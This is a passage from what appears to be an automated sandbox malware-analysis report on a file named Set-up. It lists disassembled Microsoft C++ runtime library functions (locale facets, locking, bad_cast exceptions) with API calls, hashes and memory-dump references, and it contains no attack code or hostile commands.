                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC1E30F
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC1E326
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC1E32F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC1E349
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC1E35D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC1E36C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC1E37C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC1E382
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC1E38F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@D@std@@ExceptionFacet_Getcat@?$ctype@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3833770082-3145022300
                                                                                              • Opcode ID: 697befa3d4f56d649ca6a873e2b54cfa6ea8ca7377e46d18226cc661810fa0da
                                                                                              • Instruction ID: b4469c567722357584fa4bdb947fc939d14282c756ad519617dc8de6328d42a0
                                                                                              • Opcode Fuzzy Hash: 697befa3d4f56d649ca6a873e2b54cfa6ea8ca7377e46d18226cc661810fa0da
                                                                                              • Instruction Fuzzy Hash: 4B01C4319346299BCF00DBB4C852AADB3317F81765F940568E021BB6D0FB3C9B01AB61
                                                                                              Function 6BC41286 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC4128D
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41297
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC412AE
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC412B7
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC412D1
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC412E5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC412F4
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41304
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC4130A
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41317
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@D@std@@@std@@@std@@ExceptionFacet_Getcat@?$time_put@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$ostreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 316688439-3145022300
                                                                                              • Opcode ID: 9f661ec7f3bd2b04429cae9fcd1fae17dcc1070cb4a101570462c8794f1b7ea1
                                                                                              • Instruction ID: b6ba26c638d6678e1d5be2e4cef66fe7f43d43cef966a738e494ef0ebe4bc6fa
                                                                                              • Opcode Fuzzy Hash: 9f661ec7f3bd2b04429cae9fcd1fae17dcc1070cb4a101570462c8794f1b7ea1
                                                                                              • Instruction Fuzzy Hash: 6C01C0719206399BCF05DBB4C852AAE7735BF80728F540528E160BB2D0FF3C9B019B61
                                                                                              Function 6BC26234 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC2627F
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC26293
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC262A2
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262B2
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC262B8
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 009f57dcd55d50ed6e772c0044f476b3b13c0ec8af83a7030a048322aab7d063
                                                                                              • Instruction ID: 1085345efc8412eba4c8821df320b814d3169758f2e0d5126fc2f8e2e237d56b
                                                                                              • Opcode Fuzzy Hash: 009f57dcd55d50ed6e772c0044f476b3b13c0ec8af83a7030a048322aab7d063
                                                                                              • Instruction Fuzzy Hash: 0501C0319206299BCF01DBB0C852AEEB331AF81765F500128E120BB2E0FB3C9B01DB61
                                                                                              Function 6BC3D234 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D23B
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D245
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D25C
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D265
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D27F
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3D293
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D2A2
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D2B2
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D2B8
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D2C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: dd7586fb4edab2335d4e92d22c72b66e7a7e7e66cc47fb1d86f65958d5580b3c
                                                                                              • Instruction ID: 7f80d38b4503498991f77005c722160d5eb7200e0de37130348fbe06107cd658
                                                                                              • Opcode Fuzzy Hash: dd7586fb4edab2335d4e92d22c72b66e7a7e7e66cc47fb1d86f65958d5580b3c
                                                                                              • Instruction Fuzzy Hash: B901A13192062997CF05DBB0C8526EE7331AF81725F940168E420BB290FB3CDB019B61
                                                                                              Function 6BC411E3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC411EA
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC411F4
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC4120B
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41214
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC4122E
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC41242
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC41251
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41261
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC41267
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41274
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 2ebc01559286f80f08e2658f8b97c824f25eb4cf4c43cceec9b2afd93b19c150
                                                                                              • Instruction ID: 4f94a88126b9d14d57160f3d305a22d661e96c38b992b0c32d440df059d3561e
                                                                                              • Opcode Fuzzy Hash: 2ebc01559286f80f08e2658f8b97c824f25eb4cf4c43cceec9b2afd93b19c150
                                                                                              • Instruction Fuzzy Hash: 9C01A1319246299BCF15DFB4C852AAE7735BF81729F540128E161FB2D0FB3C9B019B61
                                                                                              Function 6BC3D191 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D198
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D1A2
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D1B9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D1C2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3D1DC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3D1F0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D1FF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D20F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D215
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D222
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$time_get@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@_V42@@V?$istreambuf_iterator@_Vfacet@locale@2@W@std@@@std@@@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3858954810-3145022300
                                                                                              • Opcode ID: ae52c1b4fbc156728ae97d7aa500d89042c90485d180122465ab8708b8c61042
                                                                                              • Instruction ID: fdb7b94ec754cd7017278d91929e282c4c8e6304af7ca0561f8788b7b6dcef7f
                                                                                              • Opcode Fuzzy Hash: ae52c1b4fbc156728ae97d7aa500d89042c90485d180122465ab8708b8c61042
                                                                                              • Instruction Fuzzy Hash: 7601A13196062997CF05DBB0C852AAD7335BF81724F940528E020BB290FF3C9B019B61
                                                                                              Function 6BC26191 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC261DC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC261F0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC261FF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC2620F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC26215
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 800f1f171e7632fbafd4b4741ef57b0277ed3f117c38d397d661c720a79b3666
                                                                                              • Instruction ID: b5d286540e690a5710a1a28c0cce365cbadec11abed0e4054808789f2ba82e34
                                                                                              • Opcode Fuzzy Hash: 800f1f171e7632fbafd4b4741ef57b0277ed3f117c38d397d661c720a79b3666
                                                                                              • Instruction Fuzzy Hash: AA016D3192462997CF05DBB4C856AEEB3357F81729F540568E120BB290FF3C9B059B61
                                                                                              Function 6BC41140 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC41147
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41151
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41168
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41171
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC4118B
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC4119F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC411AE
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC411BE
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC411C4
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC411D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
